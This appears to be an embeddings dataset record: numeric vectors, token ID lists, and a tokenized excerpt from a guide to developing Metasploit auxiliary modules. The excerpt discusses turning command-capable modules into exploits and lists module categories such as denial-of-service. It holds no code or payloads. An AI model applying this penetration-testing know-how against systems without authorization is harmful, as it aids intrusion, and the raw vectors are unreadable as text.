0.38559505343437195, 0.10622003674507141, 0.3092801868915558, -0.36616531014442444, -0.1360730677843094, -0.47656384110450745, 0.24405620992183685, 0.04623553901910782, -0.33958104252815247, 0.046005088835954666, -0.56348717212677, 0.2600560784339905, 0.17077864706516266, -0.8619706034660339, -0.12476994097232819, 0.463543564081192, -0.3211604058742523, 0.3228117823600769, -0.06321553885936737, -0.9023974537849426, 0.10477815568447113, 0.6307581663131714, 0.9463468790054321, 0.497634619474411, 0.7819093465805054, 0.5284898281097412, -0.588679313659668, -0.42041197419166565, 0.177707239985466, 0.7253424525260925, 0.4709990620613098, -0.4231491982936859, -0.0695534348487854, -0.01019810140132904, -0.33792078495025635, -1.2424951791763306, 0.01411608885973692, 1.27682363986969, -0.5932456851005554, -0.6181140542030334, -0.007983035407960415, -0.27457886934280396, -0.8220309615135193, -1.3158828020095825, -0.8827113509178162, 0.23559603095054626, -0.20279529690742493, -0.19823426008224487, 0.35729819536209106, -1.0253221988677979, 4.001918315887451, 0.6528336405754089, 0.5882948637008667, -0.319592148065567, -0.006609991658478975, 1.3421337604522705, -0.4253477454185486, 0.20298582315444946, -0.4296043813228607, -0.3419988751411438, 0.2538953423500061, -0.6533756256103516, -0.28882738947868347, 0.6182067394256592, 0.2122824490070343, 0.4800635278224945, -1.254255771636963, -0.11348994076251984, -0.8940561413764954, -0.7887973785400391, -1.6444603204727173, 0.3458099365234375, -0.014950061216950417, 0.4161304533481598, -0.017825815826654434, 0.2847650945186615, -0.5619533658027649, -0.977299690246582, 0.7493192553520203, -0.6834539771080017, 0.3246771991252899, 0.3257386386394501, 0.8908892869949341, -0.23444335162639618, 0.4078332483768463, 0.21935053169727325, -0.04784983769059181, -0.2754591107368469, 0.2001127451658249, 0.01827891916036606, 0.7780495882034302, -0.586971640586853, -0.12026327848434448, 0.05235663428902626, -0.11311068385839462, 0.5000225305557251, -1.2394102811813354, 0.7480383515357971, -0.6028351187705994, -0.45637083053588867, 1.025168538093567, 0.14115549623966217, 0.4917448163032532, -0.8413251042366028, -0.840782105922699, -0.007252695504575968, 0.15768614411354065, -0.3726765215396881, 0.03070218116044998, 0.19525814056396484, 0.029920395463705063, 0.49509134888648987, -0.4019339978694916, 0.7401443719863892, 0.18993733823299408, 0.4747675657272339, -0.5324006676673889, 1.1946080923080444, -0.23173123598098755, -0.06655439734458923, -0.1757306009531021, 0.30003833770751953, -0.4939151108264923, -1.0975266695022583, 0.3422599732875824, -0.24807126820087433, -0.25874704122543335, -0.4023951590061188, 0.5908464789390564, -0.6644243001937866, -0.3979375958442688, -0.04812595620751381, -0.6566104292869568, -0.8973954916000366, 0.37819451093673706, 0.640910267829895, -0.2785201072692871, -0.554778516292572, 0.8753023743629456, 0.3774704337120056, 0.9080519080162048, 0.5229456424713135, -0.5846346616744995, -0.03589342534542084, 0.40058910846710205 ]
[ 2023, 2553, 1010, 2057, 1521, 2222, 2171, 2256, 2047, 3589, 1523, 2026, 1035, 12476, 1035, 3589, 1524, 1024, 1002, 21025, 2102, 4638, 5833, 1011, 1038, 2026, 1035, 12476, 1035, 11336, 7237, 2000, 1037, 2047, 3589, 1005, 2026, 1035, 12476, 1035, 11336, 1005, 1998, 2059, 2017, 2064, 2175, 3805, 1998, 5587, 2008, 11336, 1012, 2191, 2469, 2009, 1521, 1055, 1999, 1996, 6413, 4130, 1024, 1002, 21025, 2102, 5587, 1031, 11336, 4130, 1033, 2043, 2017, 5630, 2000, 3828, 1996, 3431, 1010, 10797, 1006, 2065, 2045, 1521, 1055, 2069, 2028, 11336, 1010, 2017, 2064, 2079, 21025, 2102, 10797, 1011, 1037, 2205, 2061, 2017, 2123, 1521, 1056, 2031, 2000, 2828, 1996, 11336, 4130, 1012, 3602, 1011, 1037, 2428, 2965, 2673, 1007, 1024, 1002, 21025, 2102, 10797, 1031, 11336, 4130, 1033, 2043, 2017, 1521, 2128, 2589, 1010, 5245, 2115, 3431, 1010, 2029, 2097, 2039, 11066, 2115, 3642, 2000, 2115, 6556, 3589, 1523, 2026, 1035, 12476, 1035, 3589, 1524, 1012, 2017, 2442, 5245, 2115, 3431, 1999, 2344, 2000, 12040, 1996, 4139, 5227, 1010, 2030, 3745, 2009, 2007, 2500, 2006, 1996, 4274, 1012, 1002, 21025, 2102, 5245, 4761, 2026, 1035, 12476, 1035, 3589, 7604, 3126, 2140, 1013, 3392, 1013, 3040, 1013, 14184, 1013, 2695, 3126, 2140, 1013, 3392, 1013, 3040, 1013, 5622, 2497, 1013, 5796, 2546, 1013, 4563, 1013, 2695, 102 ]
metasploit
111.txt
5
[CLS] metasploit is known for its free, open - source exploits - modules that pop shells. but in reality, penetration testers rely more on auxiliary modules, and often a successful pentest can be done without firing a single exploit. they ’ re just more handy, and the punishment for a failed attempt is generally much lower. professionals actually love auxiliary modules. another interesting fact about auxiliary modules is that some of them aren ’ t so different from being exploits. the main difference is how it ’ s defined in metasploit : if a module executes a payload, it ’ s an exploit. if not, even though it takes advantage of a vulnerability, it still belongs to the auxiliary category. if an auxiliary module is capable of running an operating system command, it could be made into an exploit by delivering a cmd * payload and / or using a command stager. so you see, if you ’ re an auxiliary module addict, you are on the right track. plan your modulejust like writing a software, before you start coding you should have a clear and specific goal for what your auxiliary module does. it ’ s never a good idea to have multiple functionalities in a single module. you should break it down into multiple modules instead. you should also think about how your module will perform in different situations. for example, if it ’ s meant to test against a tomcat server, what happens if you use it against nginx? will it error out and leave a backtrace? if it does, you should handle that properly. does your module require specific settings / conditions from the target machine? what happens if it doesn ’ t? will it error out again? most importantly, make sure to test your module thoroughly. it ’ s always ugly to find out problems in the middle of an important engagement, that just might cost you. main categories of auxiliary modulesgenerally speaking, auxiliary modules are categorized based on their behavior, but this is somewhat inconsistent so you ’ ll just have to use your best judgement and find the most appropriate one. here ’ s a list of the common ones : categorydescriptionadminmodules that modify, operate, or manipulate something on target machine. analyzewe initially created this folder for password - cracking modules that require analysis time. clientwe initially created this folder for an smtp module for social - engineering purposes. dospretty self - explanatory : denial - of - service modules. fuzzersif your module is a fuzzer,
[ -0.03701470047235489, -0.13536377251148224, -0.7727866172790527, 0.4521046578884125, -0.7899539470672607, -0.22382313013076782, -0.3999253213405609, 0.21577869355678558, 0.4214194715023041, 0.9472742676734924, 0.6978005170822144, 0.3405141830444336, 0.3092813789844513, -0.5084117650985718, -0.12724612653255463, -0.1236022561788559, 0.17327773571014404, -0.4602062702178955, -1.0562516450881958, -0.01907973736524582, 0.33457085490226746, -0.443565309047699, -0.6568266749382019, -0.5802432298660278, -0.19230759143829346, 0.2687293589115143, 0.27936142683029175, -0.4027552902698517, 0.27847740054130554, 0.6204103231430054, 0.6731451749801636, 0.17185653746128082, 0.19266870617866516, -0.6130719780921936, 0.48435068130493164, -0.17936834692955017, 0.5363629460334778, -0.43529507517814636, 0.3673610985279083, -1.043527364730835, 0.25576141476631165, 0.11881425231695175, -0.31933024525642395, -0.13623379170894623, -0.35442283749580383, 0.033855754882097244, 0.3350079357624054, -0.2876983880996704, 1.1815077066421509, -0.1391238421201706, 0.4569080173969269, 0.8934875726699829, -0.007523490581661463, 0.4742467701435089, -0.14300450682640076, -0.24639570713043213, 0.021369250491261482, -0.4303862452507019, 0.05407075583934784, 0.0629696473479271, -0.42482420802116394, 0.1002807766199112, 0.12025023251771927, -1.0481510162353516, -0.25768014788627625, 0.4412215054035187, 0.21202723681926727, 0.061268050223588943, -0.6526316404342651, -0.653416633605957, -0.17789269983768463, 0.17198209464550018, -0.493743896484375, -0.7985095977783203, -0.7840988039970398, 0.09866904467344284, 0.06602492928504944, 0.01548992283642292, -0.5118719935417175, 0.7504535913467407, -0.43267491459846497, 0.26487627625465393, -0.14978894591331482, -0.43058741092681885, 0.27437302470207214, -0.18141904473304749, 0.47974178194999695, 1.0112731456756592, -0.4764888286590576, 0.0812743529677391, 0.3917837142944336, 0.21298088133335114, -0.7723760604858398, -0.16807597875595093, 0.13282974064350128, 0.13945512473583221, -0.3892747759819031, 0.3686983287334442, 0.33485645055770874, -0.2940194010734558, 0.9943147301673889, 0.26168733835220337, 0.0644998624920845, 0.6248522996902466, -0.09091850370168686, 0.3756250739097595, 0.37599286437034607, 0.2381521314382553, 0.1211102232336998, -0.212477445602417, 0.3626517951488495, 0.03869016468524933, 0.08117988705635071, -0.5013760924339294, -0.42168283462524414, 0.23335771262645721, 0.029822465032339096, 0.21481774747371674, -0.3678244352340698, 0.6636093258857727, 0.4461510479450226, -0.7013683915138245, 0.04503334313631058, -0.39411646127700806, 0.1305949091911316, -0.163893461227417, -0.0667484700679779, 0.9594441652297974, -0.5010101795196533, -0.5452486872673035, -0.6903174519538879, -0.018386665731668472, 0.2752898037433624, 0.9769158959388733, -0.6276430487632751, 0.4027102589607239, -0.6617891192436218, 0.08438907563686371, 0.6930184364318848, -0.7769877910614014, -0.2621901333332062, 0.2044820487499237, 0.09927240759134293, 1.2173614501953125, -0.11920425295829773, -0.08881217986345291, -0.09358660131692886, -0.7189239859580994, -0.19889378547668457, 0.3374379277229309, -0.08681286871433258, -0.7914096713066101, 0.24608641862869263, -0.06459353864192963, -0.9248773455619812, -0.05924658104777336, -0.3656967282295227, 0.8305153250694275, 0.3349820375442505, 0.31453749537467957, 0.07227082550525665, 0.8973597884178162, -0.043582841753959656, 0.37929004430770874, -0.29226747155189514, 0.4956825077533722, -0.5188480019569397, -0.4961252510547638, -0.3729844391345978, 0.06805674731731415, 0.035564884543418884, -0.038560062646865845, -0.26269885897636414, 0.0018734203185886145, 1.5135338306427002, 0.9445992708206177, 0.19708818197250366, -0.2700391113758087, 0.502532958984375, 0.4124654233455658, -0.8306460976600647, 0.3132389485836029, -0.23271293938159943, 0.2427375465631485, 0.5364261269569397, 0.4731656014919281, -0.5616698265075684, -0.5599936246871948, 0.3992384374141693, 0.10469285398721695, -0.15238438546657562, 0.8650872111320496, -0.40965530276298523, 0.21944661438465118, 0.02764957956969738, -0.2162313312292099, -0.6251286268234253, 0.7101323008537292, 0.11708354204893112, -1.3445502519607544, -0.5466320514678955, 0.7356661558151245, -0.3332960307598114, 0.7093310952186584, -0.3232903778553009, -0.47763821482658386, 0.8760388493537903, 0.7794443964958191, 0.05496051535010338, 0.32940414547920227, 0.6951176524162292, 0.012527850456535816, -0.44925928115844727, -0.07008647918701172, -0.16079047322273254, -0.26009804010391235, -0.5212026238441467, 0.1837146282196045, 0.05927341431379318, 0.3099457621574402, -0.2096894085407257, 0.10494643449783325, 0.47895053029060364, 0.17891155183315277, 0.28282397985458374, -0.5725718140602112, -0.20429962873458862, 0.18974576890468597, -0.33979088068008423, 0.10619332641363144, -0.3708879053592682, 0.4216795861721039, 0.5206451416015625, 1.1295069456100464, 0.26849648356437683, -0.23750616610050201, 0.1264728605747223, 0.039160262793302536, 0.12116481363773346, -0.1578148454427719, 0.18133381009101868, 0.8223701119422913, -0.04169269651174545, 0.3579269349575043, 0.3706933259963989, 0.1133953332901001, 0.4082202613353729, 0.3745277523994446, -0.13904905319213867, 0.6064499616622925, -0.4367996156215668, 0.8152524828910828, -0.03391169384121895, 0.06578207015991211, -0.1465052217245102, -0.49533170461654663, 0.03982921317219734, 0.8187142014503479, -0.8991389274597168, -0.1988113671541214, -0.21154668927192688, -0.06983814388513565, -0.6747716665267944, -0.06263621151447296, 0.6132755279541016, 0.24269336462020874, 0.25764134526252747, 0.2770553529262543, -0.369537353515625, -0.4995250701904297, -0.6605760455131531, -0.05643564462661743, -0.4754641354084015, -0.509922444820404, -0.9135203957557678, -0.3949628472328186, -0.22573959827423096, -0.33502811193466187, 0.11954399943351746, -0.785765528678894, -0.1360870748758316, 0.005311400163918734, 0.07902826368808746, 0.6741389632225037, 0.37412384152412415, -0.2252858728170395, -1.1179784536361694, 0.5072951316833496, -0.37127041816711426, 0.708458423614502, -0.41512930393218994, -0.4176633656024933, -0.12841996550559998, 0.5545678734779358, -0.1337408572435379, 0.2821353077888489, 1.0477664470672607, 0.11407206952571869, 0.045371804386377335, -0.2766406536102295, -0.15699215233325958, 0.24784858524799347, 0.30323052406311035, 0.4867652356624603, -0.07750274240970612, 0.716515064239502, -0.2180112600326538, -0.3683553636074066, 0.2060626894235611, 0.7710941433906555, -0.45971807837486267, 0.679416835308075, -0.43527814745903015, 0.09164360165596008, -0.5404796004295349, 0.4313583970069885, 0.1320255845785141, 0.07461731880903244, -0.42998006939888, -0.21950633823871613, -0.09250563383102417, -0.24441392719745636, 0.03805215656757355, -0.42417702078819275, -0.512653648853302, 0.556464672088623, -0.15755893290042877, -0.821056067943573, 0.4351652264595032, -0.3165575861930847, 0.06122291460633278, -0.12187348306179047, -0.3517148196697235, 0.9608396291732788, 0.49407291412353516, 0.2860944867134094, -0.49545642733573914, 0.1019040048122406, -0.19502371549606323, -0.2490973174571991, -0.16448143124580383, -0.5248182415962219, 0.5979022979736328, -0.02354099042713642, -0.15441995859146118, 1.0133973360061646, 0.15052354335784912, -0.12964217364788055, -0.2736460864543915, -0.07747246325016022, -0.04316951707005501, -0.3245686888694763, 0.4538246691226959, 0.60479736328125, 0.7492551803588867, 1.1451692581176758, -0.21206778287887573, -0.30449917912483215, 0.3663979768753052, 0.2707623243331909, 0.1998661458492279, 0.32783493399620056, 0.2634642720222473, -0.26893776655197144, -0.6111313700675964, 0.018192540854215622, -0.26401910185813904, 0.4740488529205322, -0.06687269359827042, -0.030625566840171814, 0.6569199562072754, 0.049773670732975006, -0.3208504915237427, 0.45861226320266724, -0.06182184815406799, -0.3856409192085266, 0.8763002753257751, 0.22129963338375092, 0.9471283555030823, 0.031433526426553726, -0.05884057283401489, -0.3064197301864624, -0.12224341183900833, 0.30596253275871277, -0.12296696752309799, -0.7316243052482605, -0.20368412137031555, -0.7975531816482544, -0.19906850159168243, 0.25899598002433777, -0.51761794090271, 0.3889951705932617, 0.6982614994049072, -0.45347049832344055, -0.16754566133022308, -0.7905977964401245, 0.773269534111023, 0.7849960923194885, 0.516390860080719, 0.6699223518371582, 0.5452812910079956, 0.34550002217292786, -0.22300606966018677, 0.14719638228416443, 0.0034902978222817183, -0.26965656876564026, -0.04439229890704155, 0.8345026969909668, -0.13962331414222717, 0.23371025919914246, -0.03979173302650452, 0.5435950756072998, -0.3956860303878784, 0.07215054333209991, -0.016150277107954025, -0.15131612122058868, -0.24488654732704163, 0.1296696960926056, 0.15875393152236938, 0.03461332991719246, 0.27293434739112854, -0.36526989936828613, -0.35659459233283997, 0.028140584006905556, 0.3088172376155853, -0.6595290899276733, -0.35513803362846375, -0.6764294505119324, 0.0916343703866005, 0.23614653944969177, 0.1524146944284439, -0.2535456120967865, -0.6307857632637024, -0.4362362325191498, -0.7187297344207764, -0.35136792063713074, 0.18897058069705963, 0.47262507677078247, -0.15889912843704224, -0.42316320538520813, 0.3317120373249054, -0.11962812393903732, -0.36488303542137146, -0.493709534406662, -0.21918776631355286, 0.05710938572883606, 0.4985809922218323, 0.33033570647239685, -0.36022865772247314, -0.5874872803688049, -0.04319632798433304, -1.1973294019699097, 0.8064194917678833, -0.6249591112136841, 0.7623142004013062, 0.11091340333223343, 0.013104760088026524, -0.03262840583920479, 0.1628543734550476, -0.1960889995098114, -0.2916620373725891, -0.5823297500610352, 0.2594703435897827, -0.560039222240448, 0.00578837376087904, 0.3330712914466858, -0.1730736643075943, -0.9330198168754578, 0.7016580700874329, 0.29292312264442444, -0.23018017411231995, -0.16386651992797852, -0.4370900094509125, -0.6815500259399414, 0.2981986105442047, -0.6115845441818237, 0.010353092104196548, 0.17756935954093933, -0.08943752199411392, -0.12080647796392441, -0.5860959887504578, 0.38169339299201965, 0.22861619293689728, 0.08767122775316238, -0.34252163767814636, -0.46213045716285706, 0.38333621621131897, 0.5841872096061707, -0.4084942042827606, 0.2782779037952423, 0.17974501848220825, -0.08777453005313873, -0.5158275961875916, -0.7372890114784241, -0.7267584800720215, -0.4941301941871643, 0.08375148475170135, 0.29107555747032166, 0.19002309441566467, 0.5120627284049988, 0.3676624894142151, -0.25593358278274536, -0.2758200764656067, 0.2669995427131653, -0.4680717885494232, -0.2242325097322464, -0.5759071707725525, -0.02407129853963852, -0.7349478602409363, 0.3400545120239258, -0.9741508364677429, 0.3542506992816925, -0.6284531354904175, 0.2621937394142151, -0.29534879326820374, -0.14676088094711304, 0.5191937685012817, -0.33296602964401245, -0.09728549420833588, 0.7484531998634338, -0.017955366522073746, -0.44200652837753296, -0.054030098021030426, 0.4078112542629242, -0.3562697768211365, 0.2072691023349762, -0.08632257580757141, -0.5293870568275452, -0.542839765548706, -0.8563368320465088, 0.40163654088974, -0.4718669354915619, 0.4114263653755188, -0.7262100577354431, -0.8070812821388245, -0.9143125414848328, 0.38264450430870056, 0.24130837619304657, -1.2468541860580444, -0.03026178665459156, 0.3665209412574768, -0.04392210766673088, -0.19369585812091827, 0.05033474043011665, -0.05125809088349342, -0.9384725689888, -0.09644930809736252, 0.43416839838027954, 0.21821463108062744, -0.1344558298587799, 0.07093589007854462, 0.2325577288866043, 0.13597670197486877, -0.06265583634376526, -0.6362262964248657, -0.36025458574295044, -0.19008582830429077, 0.10759209841489792, -0.4075724482536316, 0.449587881565094, -0.5053514838218689, 0.845480740070343, -0.5931215882301331, 0.3659757375717163, 0.06048521026968956, 0.08395261317491531, 0.06654269248247147, 0.0055301920510828495, 0.2890384793281555, -0.14288268983364105, 0.2375439703464508, 0.05834444984793663, 0.590802013874054, 0.001940628862939775, -0.30151766538619995, -0.6068049073219299, 0.6123694181442261, -0.7473194003105164, -1.3521747589111328, 0.9960042238235474, 0.1025143712759018, 0.05070265382528305, -0.057490356266498566, -0.1884370893239975, 0.41519978642463684, -0.34433603286743164, -0.024514129385352135, 0.9901798367500305, 0.5338716506958008, 0.4112141728401184, -0.363988995552063, 0.579730212688446, 0.6407299041748047, 0.06700469553470612, 0.8543707728385925, 0.47629860043525696, 0.12495845556259155, 0.16783294081687927, -0.26611989736557007, 0.12994620203971863, -0.8552320003509521, -0.5974212288856506, 0.6177381277084351, 0.10092752426862717, 0.6800496578216553, -0.20409727096557617, -0.6368765830993652, -0.08937997370958328, 0.37972894310951233, -0.029157835990190506, 0.10745682567358017, 0.8338936567306519, 0.8714547157287598, 0.10952121764421463, -0.5997610092163086, 0.08722887933254242, -0.6470904350280762, 0.031336214393377304, 0.4320959150791168, -0.05606413260102272, -0.12388699501752853, 0.9252851009368896, 0.37879836559295654, -0.5375468134880066, -0.5081540942192078, -0.8607348203659058, -0.47776973247528076, 0.005754121113568544, -0.5287567377090454, -0.9870273470878601, 0.11057846248149872, -0.08021808415651321, 0.4355536103248596, 0.5003874897956848, -0.31824061274528503, 0.3322904109954834, -0.7173994779586792, 0.31178590655326843, -0.056039392948150635, 0.30311810970306396, 0.9531759023666382, -0.8110760450363159, -0.3677941560745239, -0.7972949743270874, 0.25958091020584106, -0.16858594119548798, 0.2905958294868469, 0.49321648478507996, -0.02781914733350277, 0.31819042563438416, -0.1837952435016632, 0.06138768792152405, 0.8485574722290039, -0.7577309608459473, 0.06167728826403618, 0.7317308187484741, -0.563981294631958, -0.7820157408714294, -0.4066877067089081, -0.17891204357147217, -0.47784891724586487, 1.0270740985870361, 0.48343586921691895, -0.26176348328590393, 0.24211987853050232, 0.3247484564781189, -0.5644017457962036, -0.7959083318710327, -0.7515912055969238, -1.2550445795059204, -0.561916708946228, 0.1278114765882492, -0.2828177809715271, 0.13194435834884644, 0.26258766651153564, -0.3616986870765686, -0.5067530274391174, -0.6308600306510925, 0.2751794457435608, -0.392551451921463, 0.020662831142544746, -0.2702079713344574, 0.5495637655258179, -0.4107455015182495, -0.6500481367111206, -0.49225521087646484, -0.11092907935380936, -0.6099096536636353, -0.8663716912269592, -0.07387936860322952, 0.5508019328117371, -0.29473942518234253, 0.6228727102279663, -0.5864689946174622, -0.30764472484588623, 0.014124024659395218, -0.7945696711540222, -0.3289047181606293, 0.7681355476379395, -0.6113336086273193, 0.40486520528793335, -0.12465982884168625, -0.08960556983947754, 0.8772037029266357, -0.6395396590232849, 0.1037413701415062, 0.21128854155540466, 0.38840317726135254, 0.22718068957328796, -0.11400289088487625, -0.8262264728546143, 0.170974001288414, 0.22559741139411926, -0.30529722571372986, -0.3383822441101074, -0.609358012676239, 0.3371555209159851, 0.2639683783054352, -0.4927428364753723, 0.33819645643234253, 0.971385657787323, -0.18095125257968903, -0.3311234414577484, -0.31235820055007935, 1.0049856901168823, 1.0412081480026245, 0.5335926413536072, -0.2265925407409668, 0.22268258035182953, 0.12842801213264465, -0.4003904461860657, -0.5399647355079651, 0.4857514798641205, -0.6838516592979431, 0.19778414070606232, 0.20730802416801453, -0.2617177367210388, -0.5335525870323181, -0.34161749482154846, -0.06144829839468002, 0.3941708505153656, 0.11914630234241486, -0.17849811911582947, 0.47960364818573, 0.23928014934062958, -0.4757159650325775, -0.6468712091445923, -0.8139535784721375, 0.06954440474510193, 0.19786211848258972, -0.5678240060806274, -0.10439406335353851, 0.08336801826953888, -0.26939278841018677, 0.21117931604385376, -0.36011072993278503, 0.3793598413467407, 0.1257520467042923, 0.02869807556271553, -0.21095037460327148, 1.0018901824951172, -0.3929829001426697, -0.33290958404541016, -0.3877449333667755, 0.27027061581611633, -0.8993829488754272, -1.076702356338501, -0.030931223183870316, 1.070522665977478, 0.017430394887924194, -0.3045806586742401, -0.3109619617462158, 0.23484297096729279, 0.07591784000396729, -0.04560493677854538, -0.23679637908935547, -0.003661292139440775, -0.8578872084617615, 0.43068215250968933, -0.6231597661972046, 0.6812463998794556, 0.005399602465331554, -0.008882098831236362, 0.0831213891506195, 0.09337933361530304, -0.47891703248023987, 0.6211979985237122, -0.0215887650847435, 0.44129714369773865, 0.7168915271759033, 0.7903544306755066, 0.4072910249233246, -0.4920371174812317, -0.15046915411949158, -0.5222042202949524, 0.15445266664028168, 0.03215646371245384, 0.21828073263168335, -0.061371736228466034, 0.4590293765068054, 0.36320245265960693, -0.946884036064148, -0.17186731100082397, 0.5810039639472961, 0.06449460983276367, -0.2307855486869812, 0.4579666554927826, -0.5378640294075012, 0.1501753181219101, -0.28935855627059937, -0.2615112066268921, 0.4156263470649719, -0.21010172367095947, 0.6181355118751526, 0.28461575508117676, 0.018706297501921654, 0.488272488117218, -0.28891316056251526, 0.032843317836523056, 0.10618318617343903, 0.1554611176252365, 0.5295032858848572, -0.01019278634339571, -1.0023151636123657, 0.06817461550235748, 0.9710286855697632, 0.6597898006439209, -0.7198959589004517, 0.23170530796051025, -0.05805865302681923, 0.4000527560710907, 0.38280394673347473, 0.26919880509376526, -0.6786291599273682, 0.3732534348964691, 0.6095682978630066, -0.36116236448287964, -0.8344781398773193, 0.42133066058158875, 0.33582979440689087, -0.1718958169221878, 0.7417054772377014, -0.0177839994430542, 0.5850204825401306, -0.4378623366355896, 0.44544538855552673, -0.3225950002670288, 0.4956950843334198, 0.31176087260246277, -0.2992895841598511, -0.9045553803443909, 0.619743824005127, 0.2828362286090851, 0.3780072033405304, 0.5509357452392578, 1.2295182943344116, -0.15188996493816376, 0.6399735808372498, 0.05251336842775345, -0.303604394197464, -0.2990226149559021, -0.15546217560768127, -0.3234768211841583, -0.34206250309944153, 0.33850425481796265, -0.5902504920959473, 0.5257115960121155, -0.3028942942619324, -0.20714733004570007, -0.18554279208183289, 0.5235416889190674, -0.25709405541419983, -0.25457778573036194, 0.7506660223007202, -0.13912203907966614, -0.7763887643814087, -0.3658810555934906, 0.5483427047729492, 0.8052698969841003, 0.8060405850410461, 0.024381238967180252, -0.4805324077606201, -0.22607643902301788, -0.4275386929512024, -0.6015408039093018, 0.5951812863349915, -0.5433500409126282, -0.2451150268316269, -0.11640256643295288, -0.726841151714325, -0.28066349029541016, 0.477933794260025, -0.30768731236457825, -0.6238899230957031, 0.5827028155326843, -0.0519588366150856, 0.5743505954742432, 0.4352850019931793, -0.10483139008283615, 0.10591436177492142, 0.2925727367401123, 0.8121681213378906, -0.4707409739494324, 0.5886799097061157, 0.21484743058681488, 0.20125500857830048, 0.349395215511322, -0.577632486820221, 0.4569101929664612, -0.26405736804008484, 0.3419884145259857, -0.04973480477929115, 0.5219512581825256, -0.8105561137199402, -0.33610618114471436, 0.27347996830940247, -0.16450980305671692, 0.24616870284080505, -0.1435796171426773, -0.9020829200744629, -0.258592426776886, -1.147196650505066, -0.33574870228767395, -0.3666548430919647, -0.06897405534982681, -0.2181532233953476, -0.1068296954035759, 0.3436495065689087, -0.8383414149284363, 4.501649856567383, 0.5072182416915894, 0.09336180239915848, -0.18912246823310852, -0.016588324680924416, 0.6545073986053467, 0.8845683336257935, -0.6475004553794861, 0.5402335524559021, -0.403647780418396, -0.061505723744630814, -0.06525267660617828, 0.5971236228942871, 0.27954161167144775, 0.9768845438957214, 0.6195643544197083, -0.3994711935520172, 0.054898034781217575, 0.1268329918384552, -0.5380904674530029, -1.3706942796707153, -0.013943517580628395, -0.1819186955690384, 1.038504958152771, 0.27773135900497437, -0.007521475665271282, -0.12865960597991943, -0.8882587552070618, 0.8194785714149475, -0.8740310668945312, -0.09430146962404251, -0.2100611925125122, 0.2781701982021332, -0.19818562269210815, -0.2650611996650696, 0.23457470536231995, -0.2919473946094513, -0.31968259811401367, -0.42407241463661194, -0.4365050792694092, 0.4878796637058258, -0.20145830512046814, -0.15046387910842896, -0.6011167168617249, 0.11983613669872284, 1.0034091472625732, -0.7284888029098511, 0.6783995032310486, 1.0094321966171265, -0.9867804646492004, 0.4972064197063446, -0.29021382331848145, 0.8533099889755249, 0.01615729369223118, -0.8832012414932251, 0.3312234878540039, 0.1484522819519043, -0.27447041869163513, 0.2915615737438202, 0.29110872745513916, 0.3656293451786041, -0.35878434777259827, 0.11858579516410828, 0.008754715323448181, -0.28789472579956055, -0.09596670418977737, -0.34393060207366943, 0.21992456912994385, 0.018417835235595703, 0.28123217821121216, -0.7478514313697815, 0.06569445878267288, -0.5572271347045898, -0.46418455243110657, 0.9496324062347412, 0.07123173773288727, 0.1989513784646988, -0.3740915060043335, 0.2063518911600113, -0.41166993975639343, -0.2451624870300293, -0.2827817499637604, -0.7953158020973206, 0.49151113629341125, -0.08127468079328537, 0.7426333427429199, -0.2390318512916565, -0.5458016395568848, 0.09411630034446716, 0.43567898869514465, 0.541729211807251, -0.10305724292993546, -0.2257278859615326, 0.4229259192943573, 0.19106023013591766 ]
[ 101, 18804, 13102, 4135, 4183, 2003, 2124, 2005, 2049, 2489, 1010, 2330, 1011, 3120, 20397, 1011, 14184, 2008, 3769, 10986, 1012, 2021, 1999, 4507, 1010, 20015, 3231, 2545, 11160, 2062, 2006, 9830, 14184, 1010, 1998, 2411, 1037, 3144, 7279, 22199, 2064, 2022, 2589, 2302, 7493, 1037, 2309, 18077, 1012, 2027, 1521, 2128, 2074, 2062, 18801, 1010, 1998, 1996, 7750, 2005, 1037, 3478, 3535, 2003, 3227, 2172, 2896, 1012, 8390, 2941, 2293, 9830, 14184, 1012, 2178, 5875, 2755, 2055, 9830, 14184, 2003, 2008, 2070, 1997, 2068, 4995, 1521, 1056, 2061, 2367, 2013, 2108, 20397, 1012, 1996, 2364, 4489, 2003, 2129, 2009, 1521, 1055, 4225, 1999, 18804, 13102, 4135, 4183, 1024, 2065, 1037, 11336, 15389, 2015, 1037, 18093, 1010, 2009, 1521, 1055, 2019, 18077, 1012, 2065, 2025, 1010, 2130, 2295, 2009, 3138, 5056, 1997, 1037, 18130, 1010, 2009, 2145, 7460, 2000, 1996, 9830, 4696, 1012, 2065, 2019, 9830, 11336, 2003, 5214, 1997, 2770, 2019, 4082, 2291, 3094, 1010, 2009, 2071, 2022, 2081, 2046, 2019, 18077, 2011, 12771, 1037, 4642, 2094, 1008, 18093, 1998, 1013, 2030, 2478, 1037, 3094, 2754, 2099, 1012, 2061, 2017, 2156, 1010, 2065, 2017, 1521, 2128, 2019, 9830, 11336, 26855, 1010, 2017, 2024, 2006, 1996, 2157, 2650, 1012, 2933, 2115, 11336, 29427, 2066, 3015, 1037, 4007, 1010, 2077, 2017, 2707, 16861, 2017, 2323, 2031, 1037, 3154, 1998, 3563, 3125, 2005, 2054, 2115, 9830, 11336, 2515, 1012, 2009, 1521, 1055, 2196, 1037, 2204, 2801, 2000, 2031, 3674, 8360, 6447, 1999, 1037, 2309, 11336, 1012, 2017, 2323, 3338, 2009, 2091, 2046, 3674, 14184, 2612, 1012, 2017, 2323, 2036, 2228, 2055, 2129, 2115, 11336, 2097, 4685, 1999, 2367, 8146, 1012, 2005, 2742, 1010, 2065, 2009, 1521, 1055, 3214, 2000, 3231, 2114, 1037, 3419, 11266, 8241, 1010, 2054, 6433, 2065, 2017, 2224, 2009, 2114, 12835, 2378, 2595, 1029, 2097, 2009, 7561, 2041, 1998, 2681, 1037, 2067, 6494, 3401, 1029, 2065, 2009, 2515, 1010, 2017, 2323, 5047, 2008, 7919, 1012, 2515, 2115, 11336, 5478, 3563, 10906, 1013, 3785, 2013, 1996, 4539, 3698, 1029, 2054, 6433, 2065, 2009, 2987, 1521, 1056, 1029, 2097, 2009, 7561, 2041, 2153, 1029, 2087, 14780, 1010, 2191, 2469, 2000, 3231, 2115, 11336, 12246, 1012, 2009, 1521, 1055, 2467, 9200, 2000, 2424, 2041, 3471, 1999, 1996, 2690, 1997, 2019, 2590, 8147, 1010, 2008, 2074, 2453, 3465, 2017, 1012, 2364, 7236, 1997, 9830, 14184, 6914, 21673, 2135, 4092, 1010, 9830, 14184, 2024, 20427, 2241, 2006, 2037, 5248, 1010, 2021, 2023, 2003, 5399, 20316, 2061, 2017, 1521, 2222, 2074, 2031, 2000, 2224, 2115, 2190, 16646, 1998, 2424, 1996, 2087, 6413, 2028, 1012, 2182, 1521, 1055, 1037, 2862, 1997, 1996, 2691, 3924, 1024, 4696, 6155, 23235, 3258, 4215, 10020, 5302, 8566, 4244, 